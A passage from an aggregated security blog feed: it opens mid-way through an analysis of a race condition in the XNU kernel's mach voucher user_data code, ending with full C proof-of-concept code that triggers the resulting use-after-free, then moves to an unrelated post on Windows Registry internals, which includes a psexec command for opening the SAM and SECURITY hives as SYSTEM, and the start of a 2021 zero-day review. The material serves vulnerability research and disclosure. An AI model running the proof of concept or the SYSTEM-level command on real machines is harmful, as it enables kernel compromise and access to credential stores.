The final step occurs when host_create_mach_voucher returns. Since this is a MIG method, if it returns success and new_voucher isn't IV_NULL, new_voucher will be converted into a mach port; a send right to which will be given to the userspace caller. This is the final level of deduplication; there can only ever be one mach port representing a particular voucher. This is implemented by the voucher structure's iv_port member.

(For the sake of completeness note that there are actually two userspace interfaces to host_create_mach_voucher; the host port MIG method and also the host_create_mach_voucher_trap mach trap. The trap interface has to emulate the MIG semantics though.)

Destruction

Although I did briefly hint at a vulnerability above we still haven't actually seen enough code to determine that that bug actually has any security consequences. This is where things get complicated ;-)

Let's start with the result of the situation we described above, where we created a voucher port with the following recipe:

struct udata_dword_recipe {

  mach_voucher_attr_recipe_data_t recipe;

  uint32_t payload;

};

struct udata_dword_recipe r = {0};

r.recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

r.recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

r.recipe.content_size = sizeof(uint32_t);

r.payload = 0x41414141;

This will end up with the following data structures in the kernel:

voucher_port {

  ip_kobject = reference-counted pointer to the voucher

}

voucher {

  iv_refs = 1;

  iv_table[6] = reference-counted *index* into user_data controller's ivac_table

}

controller {

  ivace_table[index] =

    {

      ivace_refs = 1;

      ivace_made = 1;

      ivace_value = pointer to user_data_value_element

    }

}

user_data_value_element {

  e_made = 1;

  e_data[] = {0x41, 0x41, 0x41, 0x41}

}

Let's look at what happens when we drop the only send right to the voucher port and the voucher gets deallocated.

We'll skip analysis of the mach port part; essentially, once all the send rights to the mach port holding a reference to the voucher are deallocated iv_release will get called to drop its reference on the voucher. And if that was the last reference iv_release calls iv_dealloc and we'll pick up the code there:

void

iv_dealloc(ipc_voucher_t iv, boolean_t unhash)

iv_dealloc removes the voucher from the hash table, destroys the mach port associated with the voucher (if there was one) then releases a reference on each value index in the iv_table:

        for (i = 0; i < iv->iv_table_size; i++) {

                ivace_release(i, iv->iv_table[i]);

        }

Recall that the index in the iv_table is the "key index", which is one less than the key, which is why i is being passed to ivace_release. The value in iv_table alone is meaningless without knowing under which index it was stored in the iv_table. Here's the start of ivace_release:

static void

ivace_release(

        iv_index_t key_index,

        iv_index_t value_index)

{

...

        ivgt_lookup(key_index, FALSE, &ivam, &ivac);

        ivac_lock(ivac);

        assert(value_index < ivac->ivac_table_size);

        ivace = &ivac->ivac_table[value_index];

        assert(0 < ivace->ivace_refs);

        /* cant release persistent values */

        if (ivace->ivace_persist) {

                ivac_unlock(ivac);

                return;

        }

        if (0 < --ivace->ivace_refs) {

                ivac_unlock(ivac);

                return;

        }

First they grab references to the attribute manager and controller for the given key index (ivam and ivac), take the ivac lock then take calculate a pointer into the ivac's ivac_table to get a pointer to the ivac_entry corresponding to the value_index to be released.

If this entry is marked as persistent, then nothing happens, otherwise the ivace_refs field is decremented. If the reference count is still non-zero, they drop the ivac's lock and return. Otherwise, the reference count of this ivac_entry has gone to zero and they will continue on to "free" the ivac_entry. As noted before, this isn't going to free the ivac_entry to the zone allocator; the entry is just an entry in an array and in its free state its index is present in a freelist of empty indexes. The code continues thus:

        key = iv_index_to_key(key_index);

        assert(MACH_VOUCHER_ATTR_KEY_NONE != key);

        /*

         * if last return reply is still pending,

         * let it handle this later return when

         * the previous reply comes in.

         */

        if (ivace->ivace_releasing) {

                ivac_unlock(ivac);

                return;

        }

        /* claim releasing */

        ivace->ivace_releasing = TRUE;

iv_index_to_key goes back from the key_index to the key value (which in practice will be 1 greater than the key index.) Then the ivace_entry is marked as "releasing". The code continues:

        value = ivace->ivace_value;

redrive:

        assert(value == ivace->ivace_value);

        assert(!ivace->ivace_free);

        made = ivace->ivace_made;

        ivac_unlock(ivac);

        /* callout to manager's release_value */

        kr = (ivam->ivam_release_value)(ivam, key, value, made);

        /* recalculate entry address as table may have changed */

        ivac_lock(ivac);

        ivace = &ivac->ivac_table[value_index];

        assert(value == ivace->ivace_value);

        /*

         * new made values raced with this return.  If the

         * manager OK'ed the prior release, we have to start

         * the made numbering over again (pretend the race

         * didn't happen). If the entry has zero refs again,

         * re-drive the release.

         */

        if (ivace->ivace_made != made) {

                if (KERN_SUCCESS == kr) {

                        ivace->ivace_made -= made;

                }

                if (0 == ivace->ivace_refs) {

                        goto redrive;

                }

                ivace->ivace_releasing = FALSE;

                ivac_unlock(ivac);

                return;

        } else {

Note that we enter this snippet with the ivac's lock held. The ivace->ivace_value and ivace->ivace_made values are read under that lock, then the ivac lock is dropped and the attribute managers release_value callback is called:

        kr = (ivam->ivam_release_value)(ivam, key, value, made);

Here's the user_data ivam_release_value callback:

static kern_return_t

user_data_release_value(

        ipc_voucher_attr_manager_t              __assert_only manager,

        mach_voucher_attr_key_t                 __assert_only key,

        mach_voucher_attr_value_handle_t        value,

        mach_voucher_attr_value_reference_t     sync)

{

        user_data_element_t elem;

        iv_index_t hash;

        assert(&user_data_manager == manager);

        USER_DATA_ASSERT_KEY(key);

        elem = (user_data_element_t)value;

        hash = elem->e_hash;

        user_data_lock();

        if (sync == elem->e_made) {

                queue_remove(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link);

                user_data_unlock();

                kfree(elem, sizeof(*elem) + elem->e_size);

                return KERN_SUCCESS;

        }

        assert(sync < elem->e_made);

        user_data_unlock();

        return KERN_FAILURE;

}

Under the user_data lock (via user_data_lock()) the code checks whether the user_data_value_element's e_made field is equal to the sync value passed in. Looking back at the caller, sync is ivace->ivace_made. If and only if those values are equal does this method remove the user_data_value_element from the hashtable and free it (via kfree) before returning success. If sync isn't equal to e_made, this method returns KERN_FAILURE.

Having looked at the semantics of user_data_free_value let's look back at the callsite:

redrive:

        assert(value == ivace->ivace_value);

        assert(!ivace->ivace_free);

        made = ivace->ivace_made;

        ivac_unlock(ivac);

        /* callout to manager's release_value */

        kr = (ivam->ivam_release_value)(ivam, key, value, made);

        /* recalculate entry address as table may have changed */

        ivac_lock(ivac);

        ivace = &ivac->ivac_table[value_index];

        assert(value == ivace->ivace_value);

        /*

         * new made values raced with this return.  If the

         * manager OK'ed the prior release, we have to start

         * the made numbering over again (pretend the race

         * didn't happen). If the entry has zero refs again,

         * re-drive the release.

         */

        if (ivace->ivace_made != made) {

                if (KERN_SUCCESS == kr) {

                        ivace->ivace_made -= made;

                }

                if (0 == ivace->ivace_refs) {

                        goto redrive;

                }

                ivace->ivace_releasing = FALSE;

                ivac_unlock(ivac);

                return;

        } else {

They grab the ivac's lock again and recalculate a pointer to the ivace (because the table could have been reallocated while the ivac lock was dropped, and only the index into the table would be valid, not a pointer.)

Then things get really weird; if ivace->ivace_made isn't equal to made but user_data_release_value did return KERN_SUCCESS, then they subtract the old value of ivace_made from the current value of ivace_made, and if ivace_refs is 0, they use a goto statement to try to free the user_data_value_element again?

If that makes complete sense to you at first glance then give yourself a gold star! Because to me at first that logic was completely impenetrable. We will get to the bottom of it though.

We need to ask the question: under what circumstances will ivace_made and the user_data_value_element's e_made field ever be different? To answer this we need to look back at ipc_voucher_replace_value where the user_data_value_element and ivace are actually allocated:

        kr = (ivam->ivam_get_value)(

                ivam, key, command,

                previous_vals, previous_vals_count,

                content, content_size,

                &new_value, &new_flag, &new_value_voucher);

        if (KERN_SUCCESS != kr) {

                ivac_release(ivac);

                return kr;

        }

... /* WINDOW */

        val_index = ivace_reference_by_value(ivac, new_value, new_flag);

We already looked at this code; if you can't remember what ivam_get_value or ivace_reference_by_value are meant to do, I'd suggest going back and looking at those sections again.

Firstly, ipc_voucher_replace_value itself isn't holding any locks. It does however hold a few references (e.g., on the ivac and ivam.)

user_data_get_value (the value of ivam->ivam_get_value) only takes the user_data lock (and not in all paths; we'll get to that) and ivace_reference_by_value, which increments ivace->ivace_made does that under the ivac lock.

e_made should therefore always get incremented before any corresponding ivace's ivace_made field. And there is a small window (marked as WINDOW above) where e_made will be larger than the ivace_made field of the ivace which will end up with a pointer to the user_data_value_element. If, in exactly that window shown above, another thread grabs the ivac's lock and drops the last reference (ivace_refs) on the ivace which currently points to that user_data_value_element then we'll encounter one of the more complex situations outlined above where, in ivace_release ivace_made is not equal to the user_data_value_element's e_made field. The reason that there is special treatment of that case is that it's indicating that there is a live pointer to the user_data_value_element which isn't yet accounted for by the ivace, and therefore it's not valid to free the user_data_value_element.

Another way to view this is that it's a hack around not holding a lock across that window shown above.

With this insight we can start to unravel the "redrive" logic:

        if (ivace->ivace_made != made) {

                if (KERN_SUCCESS == kr) {

                        ivace->ivace_made -= made;

                }

                if (0 == ivace->ivace_refs) {

                        goto redrive;

                }

                ivace->ivace_releasing = FALSE;

                ivac_unlock(ivac);

                return;

        } else {

                /*

                 * If the manager returned FAILURE, someone took a

                 * reference on the value but have not updated the ivace,

                 * release the lock and return since thread who got

                 * the new reference will update the ivace and will have

                 * non-zero reference on the value.

                 */

                if (KERN_SUCCESS != kr) {

                        ivace->ivace_releasing = FALSE;

                        ivac_unlock(ivac);

                        return;

                }

        }

Let's take the first case:

made is the value of ivace->ivace_made before the ivac's lock was dropped and re-acquired. If those are different, it indicates that a race did occur and another thread (or threads) revived this ivace (since even though the refs has gone to zero it hasn't yet been removed by this thread from the ivac's hash table, and even though it's been marked as being released by setting ivace_releasing to TRUE, that doesn't prevent another reference being handed out on a racing thread.)

There are then two distinct sub-cases:

1) (ivace->ivace_made != made) and (KERN_SUCCESS == kr)

We can now parse the meaning of this: this ivace was revived but that occurred after the user_data_value_element was freed on this thread. The racing thread then allocated a *new* value which happened to be exactly the same as the ivace_value this ivace has, hence the other thread getting a reference on this ivace before this thread was able to remove it from the ivac's hash table. Note that for the user_data case the ivace_value is a pointer (making this particular case even more unlikely, but not impossible) but it isn't going to always be the case that the value is a pointer; at the ivac layer the ivace_value is actually a 64-bit handle. The user_data attr chooses to store a pointer there.

So what's happened in this case is that another thread has looked up an ivace for a new ivace_value which happens to collide (due to having a matching pointer, but potentially different buffer contents) with the value that this thread had. I don't think this actually has security implications; but it does take a while to get your head around.

If this is the case then we've ended up with a pointer to a revived ivace which now, despite having a matching ivace_value, is never-the-less semantically different from the ivace we had when this thread entered this function. The connection between our thread's idea of ivace_made and the ivace_value's e_made has been severed; and we need to remove our thread's contribution to that; hence:

        if (ivace->ivace_made != made) {

                if (KERN_SUCCESS == kr) {

                        ivace->ivace_made -= made;

                }

2) (ivace->ivace_made != made) and (0 == ivace->ivace_refs)

In this case another thread (or threads) has raced, revived this ivace and then deallocated all their references. Since this thread set ivace_releasing to TRUE the racing thread, after decrementing ivace_refs back to zero encountered this:

        if (ivace->ivace_releasing) {

                ivac_unlock(ivac);

                return;

        }

and returned early from ivace_release, despite having dropped ivace_refs to zero, and it's now this thread's responsibility to continue freeing this ivace:

                if (0 == ivace->ivace_refs) {

                        goto redrive;

                }

You can see the location of the redrive label in the earlier snippets; it captures a new value from ivace_made before calling out to the attr manager again to try to free the ivace_value.

If we don't goto redrive then this ivace has been revived and is still alive, therefore all that needs to be done is set ivace_releasing to FALSE and return.

The conditions under which the other branch is taken is nicely documented in a comment. This is the case when ivace_made is equal to made, yet ivam_release_value didn't return success (so the ivace_value wasn't freed.)

                /*

                 * If the manager returned FAILURE, someone took a

                 * reference on the value but have not updated the ivace,

                 * release the lock and return since thread who got

                 * the new reference will update the ivace and will have

                 * non-zero reference on the value.

                 */

In this case, the code again just sets ivace_releasing to FALSE and continues.

Put another way, this comment explaining is exactly what happens when the racing thread was exactly in the region marked WINDOW up above, which is after that thread had incremented e_made on the same user_data_value_element which this ivace has a pointer to in its ivace_value field, but before that thread had looked up this ivace and taken a reference. That's exactly the window another thread needs to hit where it's not correct for this thread to free its user_data_value_element, despite our ivace_refs being 0.

The bug

Hopefully the significance of the user_data_value_element e_made field is now clear. It's not exactly a reference count; in fact it only exists as a kind of band-aid to work around what should be in practice a very rare race condition. But, if its value was wrong, bad things could happen if you tried :)

e_made is only modified in two places: Firstly, in user_data_dedup when a matching user_data_value_element is found in the user_data_bucket hash table:

                        /* ... we found a match... */

                        elem->e_made++;

                        user_data_unlock();

The only other place is in user_data_get_value when handling the MACH_VOUCHER_ATTR_REDEEM command during recipe parsing:

        switch (command) {

        case MACH_VOUCHER_ATTR_REDEEM:

                /* redeem of previous values is the value */

                if (0 < prev_value_count) {

                        elem = (user_data_element_t)prev_values[0];

                        assert(0 < elem->e_made);

                        elem->e_made++;

                        *out_value = prev_values[0];

                        return KERN_SUCCESS;

                }

                /* redeem of default is default */

                *out_value = 0;

                return KERN_SUCCESS;

As mentioned before, it's up to the attr managers themselves to define the semantics of redeeming a voucher; the entirety of the user_data semantics for voucher redemption are shown above. It simply returns the previous value, with e_made incremented by 1. Recall that *prev_value is either the value which was previously in this under-construction voucher for this key, or the value in the prev_voucher referenced by this sub-recipe.

If you can't spot the bug above in the user_data MACH_VOUCHER_ATTR_REDEEM code right away that's because it's a bug of omission; it's what's not there that causes the vulnerability, namely that the increment in the MACH_VOUCHER_ATTR_REDEEM case isn't protected by the user_data lock! This increment isn't atomic.

That means that if the MACH_VOUCHER_ATTR_REDEEM code executes in parallel with either itself on another thread or the elem->e_made++ increment in user_data_dedup on another thread, the two threads can both see the same initial value for e_made, both add one then both write the same value back; incrementing it by one when it should have been incremented by two.

But remember, e_made isn't a reference count! So actually making something bad happen isn't as simple as just getting the two threads to align such that their increments overlap so that e_made is wrong.

Let's think back to what the purpose of e_made is: it exists solely to ensure that if thread A drops the last ref on an ivace whilst thread B is exactly in the race window shown below, that thread doesn't free new_value on thread B's stack:

        kr = (ivam->ivam_get_value)(

                ivam, key, command,

                previous_vals, previous_vals_count,

                content, content_size,

                &new_value, &new_flag, &new_value_voucher);

        if (KERN_SUCCESS != kr) {

                ivac_release(ivac);

                return kr;

        }

... /* WINDOW */

        val_index = ivace_reference_by_value(ivac, new_value, new_flag);

And the reason the user_data_value_element doesn't get freed by thread A is because in that window, e_made will always be larger than the ivace->ivace_made value for any ivace which has a pointer to that user_data_value_element. e_made is larger because the e_made increment always happens before any ivace_made increment.

This is why the absolute value of e_made isn't important; all that matters is whether or not it's equal to ivace_made. And the only purpose of that is to determine whether there's another thread in that window shown above.

So how can we make something bad happen? Well, let's assume that we successfully trigger the e_made non-atomic increment and end up with a value of e_made which is one less than ivace_made. What does this do to the race window detection logic? It completely flips it! If, in the steady-state e_made is one less than ivace_made then we race two threads; thread A which is dropping the last ivace_ref and thread B which is attempting to revive it and thread B is in the WINDOW shown above then e_made gets incremented before ivace_made, but since e_made started out one lower than ivace_made (due to the successful earlier trigger of the non-atomic increment) then e_made is now exactly equal to ivace_made; the exact condition which indicates we cannot possibly be in the WINDOW shown above, and it's safe to free the user_data_value_element which is in fact live on thread B's stack!

Thread B then ends up with a revived ivace with a dangling ivace_value.

This gives an attacker two primitives that together would be more than sufficient to successfully exploit this bug: the mach_voucher_extract_attr_content voucher port MIG method would allow reading memory through the dangling ivace_value pointer, and deallocating the voucher port would allow a controlled extra kfree of the dangling pointer.

With the insight that you need to trigger these two race windows (the non-atomic increment to make e_made one too low, then the last-ref vs revive race) it's trivial to write a PoC to demonstrate the issue; simply allocate and deallocate voucher ports on two threads, with at least one of them using a MACH_VOUCHER_ATTR_REDEEM sub-recipe command. Pretty quickly you'll hit the two race conditions correctly.

Conclusions

It's interesting to think about how this vulnerability might have been found. Certainly somebody did find it, and trying to figure out how they might have done that can help us improve our vulnerability research techniques. I'll offer four possibilities:

1) Just read the code

Possible, but this vulnerability is quite deep in the code. This would have been a marathon auditing effort to find and determine that it was exploitable. On the other hand this attack surface is reachable from every sandbox making vulnerabilities here very valuable and perhaps worth the investment.

2) Static lock-analysis tooling

This is something which we've discussed within Project Zero over many afternoon coffee chats: could we build a tool to generate a fuzzy mapping between locks and objects which are probably meant to be protected by those locks, and then list any discrepancies where the lock isn't held? In this particular case e_made is only modified in two places; one time the user_data_lock is held and the other time it isn't. Perhaps tooling isn't even required and this could just be a technique used to help guide auditing towards possible race-condition vulnerabilities.

3) Dynamic lock-analysis tooling

Perhaps tools like ThreadSanitizer could be used to dynamically record a mapping between locks and accessed objects/object fields. Such a tool could plausibly have flagged this race condition under normal system use. The false positive rate of such a tool might be unusably high however.

4) Race-condition fuzzer

It's not inconceivable that a coverage-guided fuzzer could have generated the proof-of-concept shown below, though it would specifically have to have been built to execute parallel testcases.

As to what technique was actually used, we don't know. As defenders we need to do a better job making sure that we invest even more effort in all of these possibilities and more.

PoC:

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <pthread.h>

#include <mach/mach.h>

#include <mach/mach_voucher.h>

#include <atm/atm_types.h>

#include <voucher/ipc_pthread_priority_types.h>

// @i41nbeer

static mach_port_t

create_voucher_from_recipe(void* recipe, size_t recipe_size) {

    mach_port_t voucher = MACH_PORT_NULL;

    kern_return_t kr = host_create_mach_voucher(

            mach_host_self(),

            (mach_voucher_attr_raw_recipe_array_t)recipe,

            recipe_size,

            &voucher);

    if (kr != KERN_SUCCESS) {

        printf("failed to create voucher from recipe\n");

    }

    return voucher;

}

static void*

create_single_variable_userdata_voucher_recipe(void* buf, size_t len, size_t* template_size_out) {

    size_t recipe_size = (sizeof(mach_voucher_attr_recipe_data_t)) + len;

    mach_voucher_attr_recipe_data_t* recipe = calloc(recipe_size, 1);

    recipe->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

    recipe->command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

    recipe->content_size = len;

    uint8_t* content_buf = ((uint8_t*)recipe)+sizeof(mach_voucher_attr_recipe_data_t);

    memcpy(content_buf, buf, len);

    *template_size_out = recipe_size;

    return recipe;

}

static void*

create_single_variable_userdata_then_redeem_voucher_recipe(void* buf, size_t len, size_t* template_size_out) {

    size_t recipe_size = (2*sizeof(mach_voucher_attr_recipe_data_t)) + len;

    mach_voucher_attr_recipe_data_t* recipe = calloc(recipe_size, 1);

    recipe->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

    recipe->command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

    recipe->content_size = len;

   

    uint8_t* content_buf = ((uint8_t*)recipe)+sizeof(mach_voucher_attr_recipe_data_t);

    memcpy(content_buf, buf, len);

    mach_voucher_attr_recipe_data_t* recipe2 = (mach_voucher_attr_recipe_data_t*)(content_buf + len);

    recipe2->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

    recipe2->command = MACH_VOUCHER_ATTR_REDEEM;

    *template_size_out = recipe_size;

    return recipe;

}

struct recipe_template_meta {

    void* recipe;

    size_t recipe_size;

};

struct recipe_template_meta single_recipe_template = {};

struct recipe_template_meta redeem_recipe_template = {};

int iter_limit = 100000;

void* s3threadfunc(void* arg) {

    struct recipe_template_meta* template = (struct recipe_template_meta*)arg;

    for (int i = 0; i < iter_limit; i++) {

        mach_port_t voucher_port = create_voucher_from_recipe(template->recipe, template->recipe_size);

        mach_port_deallocate(mach_task_self(), voucher_port);

    }

    return NULL;

}

void sploit_3() {

    while(1) {

        // choose a userdata size:

        uint32_t userdata_size = (arc4random() % 2040)+8;

        userdata_size += 7;

        userdata_size &= (~7);

        printf("userdata size: 0x%x\n", userdata_size);

        uint8_t* userdata_buffer = calloc(userdata_size, 1);

        ((uint32_t*)userdata_buffer)[0] = arc4random();

        ((uint32_t*)userdata_buffer)[1] = arc4random();

        // build the templates:

        single_recipe_template.recipe = create_single_variable_userdata_voucher_recipe(userdata_buffer, userdata_size, &single_recipe_template.recipe_size);

        redeem_recipe_template.recipe = create_single_variable_userdata_then_redeem_voucher_recipe(userdata_buffer, userdata_size, &redeem_recipe_template.recipe_size);

        free(userdata_buffer);

        pthread_t single_recipe_thread;

        pthread_create(&single_recipe_thread, NULL, s3threadfunc, (void*)&single_recipe_template);

        pthread_t redeem_recipe_thread;

        pthread_create(&redeem_recipe_thread, NULL, s3threadfunc, (void*)&redeem_recipe_template);

        pthread_join(single_recipe_thread, NULL);

        pthread_join(redeem_recipe_thread, NULL);

        free(single_recipe_template.recipe);

        free(redeem_recipe_template.recipe);

    }

}

int main(int argc, char** argv) {

    sploit_3();

}

Mysteries of the Registry

15 April 2022 at 15:17

The Windows Registry is one of the most recognized aspects of Windows. It’s a hierarchical database, storing information on a machine-wide basis and on a per-user basis… mostly. In this post, I’d like to examine the major parts of the Registry, including the “real” Registry.

Looking at the Registry is typically done by launching the built-in RegEdit.exe tool, which shows the five “hives” that seem to comprise the Registry:

RegEdit showing the main hives

These so-called “hives” provide some abstracted view of the information in the Registry. I’m saying “abstracted”, because not all of these are true hives. A true hive is stored in a file. The full hive list can be found in the Registry itself – at HKLM\SYSTEM\CurrentControlSet\Control\hivelist (I’ll abbreviate HKEY_LOCAL_MACHINE as HKLM), mapping an internal key name to the file where it’s stored (more on these “internal” key names will be discussed soon):

The hive list

Let’s examine the so-called “hives” as seen in the root RegEdit’s view.

  • HKEY_LOCAL_MACHINE is the simplest to understand. It contains machine-wide information, most of it stored in files (persistent). Some details related to hardware is built when the system initializes and is only kept in memory while the system is running. Such keys are volatile, since their contents disappear when the system is shut down.
    There are many interesting keys within HKLM, but my goal is not to go over every key (that would take a full book), but highlight a few useful pieces. HKLM\System\CurrentControlSet\Services is the key where all services and device drivers are installed. Note that “CurrentControlSet” is not a true key, but in fact is a link key, connecting it to something like HKLM\System\ControlSet001. The reason for this indirection is beyond the scope of this post. Regedit does not show this fact directly – there is no way to tell whether a key is a true key or just points to a different key. This is one reason I created Total Registry (formerly called Registry Explorer), that shows these kind of nuances:
TotalRegistry showing HKLM\System\CurrentControlSet

The liked key seems to have a weird name starting with \REGISTRY\MACHINE\. We’ll get to that shortly.

Other subkeys of note under HKLM include SOFTWARE, where installed applications store their system-level information; SAM and SECURITY, where local security policy and local accounts information are managed. These two subkeys contents is not not visible – even administrators don’t get access – only the SYSTEM account is granted access. One way to see what’s in these keys is to use psexec from Sysinternals to launch RegEdit or TotalRegistry under the SYSTEM account. Here is a command you can run in an elevated command window that will launch RegEdit under the SYSTEM account (if you’re using RegEdit, close it first):

psexec -s -i -d RegEdit

The -s switch indicates the SYSTEM account. -i is critical as to run the process in the interactive session (the default would run it in session 0, where no interactive user will ever see it). The -d switch is optional, and simply returns control to the console while the process is running, rather than waiting for the process to terminate.

The other way to gain access to the SAM and SECURITY subkeys is to use the “Take Ownership” privilege (easy to do when the Permissions dialog is open), and transfer the ownership to an admin user – the owner can specify who can do what with an object, and allow itself full access. Obviously, this is not a good idea in general, as it weakens security.

The BCD00000000 subkey contains the Boot Configuration Data (BCD), normally accessed using the bcdedit.exe tool.

  • HKEY_USERS – this is the other hive that truly stores data. Its subkeys contain user profiles for all users that ever logged in locally to this machine. Each subkey’s name is a Security ID (SID), in its string representation:
HKEY_USERS

There are 3 well-known SIDs, representing the SYSTEM (S-1-5-18), LocalService (S-1-5-19), and NetworkService (S-1-5-20) accounts. These are the typical accounts used for running Windows Services. “Normal” users get ugly SIDs, such as the one shown – that’s my user’s local SID. You may be wondering what is that “_Classes” suffix in the second key. We’ll get to that as well.

  • HKEY_CURRENT_USER is a link key, pointing to the user’s subkey under HKEY_USERS running the current process. Obviously, the meaning of “current user” changes based on the process access token looking at the Registry.
  • HKEY_CLASSES_ROOT is the most curious of the keys. It’s not a “real” key in the sense that it’s not a hive – not stored in a file. It’s not a link key, either. This key is a “combination” of two keys: HKLM\Software\Classes and HKCU\Software\Classes. In other words, the information in HKEY_CLASSES_ROOT is coming from the machine hive first, but can be overridden by the current user’s hive.
    What information is there anyway? The first thing is shell-related information, such as file extensions and associations, and all other information normally used by Explorer.exe. The second thing is information related to the Component Object Model (COM). For example, the CLSID subkey holds COM class registration (GUIDs you can pass to CoCreateInstance to (potentially) create a COM object of that class). Looking at the CLSID subkey under HKLM\Software\Classes shows there are 8160 subkeys, or roughly 8160 COM classes registered on my system from HKLM:
HKLM\Software\Classes

Looking at the same key under HKEY_CURRENT_USER tells a different story:

HKCU\Software\Classes

Only 46 COM classes provide extra or overridden registrations. HKEY_CLASSES_ROOT combines both, and uses HKCU in case of a conflict (same key name). This explains the extra “_Classes” subkey within the HKEY_USERS key – it stores the per user stuff (in the file UsrClasses.dat in something like c:\Users\<username>\AppData\Local\Microsoft\Windows).

  • HKEY_CURRENT_CONFIG is a link to HKLM\SYSTEM\CurrentControlSet\Hardware\Profiles\Current

    The list of “standard” hives (the hives accessible by official Windows APIs such as RegOpenKeyEx contains some more that are not shown by Regedit. They can be viewed by TotalReg if the option “Extra Hives” is selected in the View menu. At this time, however, the tool needs to be restarted for this change to take effect (I just didn’t get around to implementing the change dynamically, as it was low on my priority list). Here are all the hives accessible with the official Windows API:
All hives

I’ll let the interested reader to dig further into these “extra” hives. On of these hives deserves special mentioning – HKEY_PERFORMANCE_DATA – it was used in the pre Windows 2000 days as a way to access Performance Counters. Registry APIs had to be used at the time. Fortunately, starting from Windows 2000, a new dedicated API is provided to access Performance Counters (functions starting with Pdh* in <pdh.h>).

Is this it? Is this the entire Registry? Not quite. As you can see in TotalReg, there is a node called “Registry”, that tells yet another story. Internally, all Registry keys are rooted in a single key called REGISTRY. This is the only named Registry key. You can see it in the root of the Object Manager’s namespace with WinObj from Sysinternals:

WinObj from Sysinternals showing the Registry key object

Here is the object details in a Local Kernel debugger:

lkd> !object \registry
Object: ffffe00c8564c860  Type: (ffff898a519922a0) Key
    ObjectHeader: ffffe00c8564c830 (new version)
    HandleCount: 1  PointerCount: 32770
    Directory Object: 00000000  Name: \REGISTRY
lkd> !trueref ffffe00c8564c860
ffffe00c8564c860: HandleCount: 1 PointerCount: 32770 RealPointerCount: 3

All other Registry keys are based off of that root key, the Configuration Manager (the kernel component in charge of the Registry) parses the remaining path as expected. This is the real Registry. The official Windows APIs cannot use this path format, but native APIs can. For example, using NtOpenKey (documented as ZwOpenKey in the Windows Driver Kit, as this is a system call) allows such access. This is how TotalReg is able to look at the real Registry.

Clearly, the normal user-mode APIs somehow map the “standard” hive path to the real Registry path. The simplest is the mapping of HKEY_LOCAL_MACHINE to \REGISTRY\MACHINE. Another simple one is HKEY_USERS mapped to \REGISTRY\USER. HKEY_CURRENT_USER is a bit more complex, and needs to be mapped to the per-user hive under \REGISTRY\USER. The most complex is our friend HKEY_CLASSES_ROOT – there is no simple mapping – the APIs have to check if there is per-user override or not, etc.

Lastly, it seems there are keys in the real Registry that cannot be reached from the standard Registry at all:

The real Registry

There is a key named “A” which seems inaccessible. This key is used for private keys in processes, very common in Universal Windows Application (UWP) processes, but can be used in other processes as well. They are not accessible generally, not even with kernel code – the Configuration Manager prevents it. You can verify their existence by searching for \Registry\A in tools like Process Explorer or TotalReg itself (by choosing Scan Key Handles from the Tools menu). Here is TotalReg, followed by Process Explorer:

TotalReg key handles
Process Explorer key handles

Finally, the WC key is used for Windows Container, internally called Silos. A container (like the ones created by Docker) is an isolated instance of a user-mode OS, kind of like a lightweight virtual machine, but the kernel is not separate (as would be with a true VM), but is provided by the host. Silos are very interesting, but outside the scope of this post.

Briefly, there are two main Silo types: An Application Silo, which is not a true container, and mostly used with application based on the Desktop Bridge technology. A classic example is WinDbg Preview. The second type is Server Silo, which is a true container. A true container must have its file system, Registry, and Object Manager namespace virtualized. This is exactly the role of the WC subkeys – provide the private Registry keys for containers. The Configuration Manager (as well as other parts of the kernel) are Silo-aware, and will redirect Registry calls to the correct subkey, having no effect on the Host Registry or the private Registry of other Silos.

You can examine some aspects of silos with the kernel debugger !silo command. Here is an example from a server 2022 running a Server Silo and the Registry keys under WC:

lkd> !silo
		Address          Type       ProcessCount Identifier
		ffff800f2986c2e0 ServerSilo 15           {1d29488c-bccd-11ec-a503-d127529101e4} (0n732)
1 active Silo(s)
lkd> !silo ffff800f2986c2e0

Silo ffff800f2986c2e0:
		Job               : ffff800f2986c2e0
		Type              : ServerSilo
		Identifier        : {1d29488c-bccd-11ec-a503-d127529101e4} (0n732)
		Processes         : 15

Server silo globals ffff800f27e65a40:
		Default Error Port: ffff800f234ee080
		ServiceSessionId  : 217
		Root Directory    : 00007ffcad26b3e1 '\Silos\732'
		State             : Running
A Server Silo’s keys

There you have it. The relatively simple-looking Registry shown in RegEdit is viewed differently by the kernel. Device driver writers find this out relatively early – they cannot use the “abstractions” provided by user mode even if these are sometimes convenient.


image-1

zodiacon

The More You Know, The More You Know You Don’t Know

By: Anonymous
19 April 2022 at 16:06

A Year in Review of 0-days Used In-the-Wild in 2021

Posted by Maddie Stone, Google Project Zero

This is our third annual year in review of 0-days exploited in-the-wild [2020, 2019]. Each year we’ve looked back at all of the detected and disclosed in-the-wild 0-days as a group and synthesized what we think the trends and takeaways are. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you’re interested in the analysis of individual exploits, please check out our root cause analysis repository.

We perform and share this analysis in order to make 0-day hard. We want it to be more costly, more resource intensive, and overall more difficult for attackers to use 0-day capabilities. 2021 highlighted just how important it is to stay relentless in our pursuit to make it harder for attackers to exploit users with 0-days. We heard over and over and over about how governments were targeting journalists, minoritized populations, politicians, human rights defenders, and even security researchers around the world. The decisions we make in the security and tech communities can have real impacts on society and our fellow humans’ lives.

We’ll provide our evidence and process for our conclusions in the body of this post, and then wrap it all up with our thoughts on next steps and hopes for 2022 in the conclusion. If digging into the bits and bytes is not your thing, then feel free to just check-out the Executive Summary and Conclusion.

Executive Summary

2021 included the detection and disclosure of 58 in-the-wild 0-days, the most ever recorded since Project Zero began tracking in mid-2014. That’s more than double the previous maximum of 28 detected in 2015 and especially stark when you consider that there were only 25 detected in 2020. We’ve tracked publicly known in-the-wild 0-day exploits in this spreadsheet since mid-2014.

While we often talk about the number of 0-day exploits used in-the-wild, what we’re actually discussing is the number of 0-day exploits detected and disclosed as in-the-wild. And that leads into our first conclusion: we believe the large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits.

